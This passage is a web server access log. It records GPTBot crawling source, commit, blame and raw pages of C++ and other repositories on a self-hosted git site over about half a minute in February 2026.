74.7.227.38] [Length 10952] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/TestService.csproj" -[17/Feb/2026:16:06:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10461] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:16:06:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10602] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:16:06:14 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_upload/main/.TemporaryDocument" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument" -[17/Feb/2026:16:06:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_upload/main/.TemporaryDocument" -[17/Feb/2026:16:06:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/.TemporaryDocument" [Client 74.7.227.38] [Length 10186] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument" -[17/Feb/2026:16:06:15 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/.TemporaryDocument" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument" -[17/Feb/2026:16:06:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/.TemporaryDocument" -[17/Feb/2026:16:06:15 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/.TemporaryDocument" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument" -[17/Feb/2026:16:06:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/.TemporaryDocument" -[17/Feb/2026:16:06:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10601] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:16:06:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 15355] [Gzip 5.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old" -[17/Feb/2026:16:06:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 11204] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old" -[17/Feb/2026:16:06:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 15355] [Gzip 5.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old" -[17/Feb/2026:16:06:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 12791] [Gzip 3.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old" -[17/Feb/2026:16:06:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 13521] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old" -[17/Feb/2026:16:06:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 11204] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old" -[17/Feb/2026:16:06:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 13523] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old" -[17/Feb/2026:16:06:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 15355] [Gzip 5.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old" -[17/Feb/2026:16:06:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.ninja_log" [Client 74.7.227.38] [Length 11392] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build" -[17/Feb/2026:16:06:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 11173] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old" -[17/Feb/2026:16:06:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 13488] [Gzip 4.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old" -[17/Feb/2026:16:06:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 9983] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old_controller.cpp" -[17/Feb/2026:16:06:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 9975] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/dummy.cpp" -[17/Feb/2026:16:06:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 9980] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old_controller.cpp" -[17/Feb/2026:16:06:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 9982] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old-transport.hpp" -[17/Feb/2026:16:06:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 9981] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old_controller.hpp" -[17/Feb/2026:16:06:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 13447] [Gzip 7.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old_controller.hpp" -[17/Feb/2026:16:06:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 9981] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old_controller.hpp" -[17/Feb/2026:16:06:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 9982] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old_controller.cpp" -[17/Feb/2026:16:06:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.ninja_log" [Client 74.7.227.38] [Length 9912] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.ninja_log" -[17/Feb/2026:16:06:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 16092] [Gzip 9.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old_controller.cpp" -[17/Feb/2026:16:06:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 9954] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old_controller.hpp" -[17/Feb/2026:16:06:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 16093] [Gzip 9.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old_controller.cpp" -[17/Feb/2026:16:06:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 9977] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/dummy.cpp" -[17/Feb/2026:16:06:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 16094] [Gzip 9.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old_controller.cpp" -[17/Feb/2026:16:06:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 9949] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/dummy.cpp" -[17/Feb/2026:16:06:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 13449] [Gzip 7.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old_controller.hpp" -[17/Feb/2026:16:06:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 13447] [Gzip 7.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old_controller.hpp" -[17/Feb/2026:16:06:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 2227] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old_controller.hpp" -[17/Feb/2026:16:06:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 12297] [Gzip 5.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old-transport.hpp" -[17/Feb/2026:16:06:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 10181] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/dummy.cpp" -[17/Feb/2026:16:06:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 30] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/dummy.cpp" -[17/Feb/2026:16:06:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 1379] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old-transport.hpp" -[17/Feb/2026:16:06:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.ninja_log" [Client 74.7.227.38] [Length 10452] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.ninja_log" -[17/Feb/2026:16:06:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 3273] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old_controller.cpp" -[17/Feb/2026:16:06:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 3273] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old_controller.cpp" -[17/Feb/2026:16:06:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 30] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/dummy.cpp" -[17/Feb/2026:16:06:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 2227] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old_controller.hpp" -[17/Feb/2026:16:06:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 12791] [Gzip 3.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old" -[17/Feb/2026:16:06:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 10179] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/dummy.cpp" -[17/Feb/2026:16:06:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 13521] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old" -[17/Feb/2026:16:06:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old_controller.cpp" 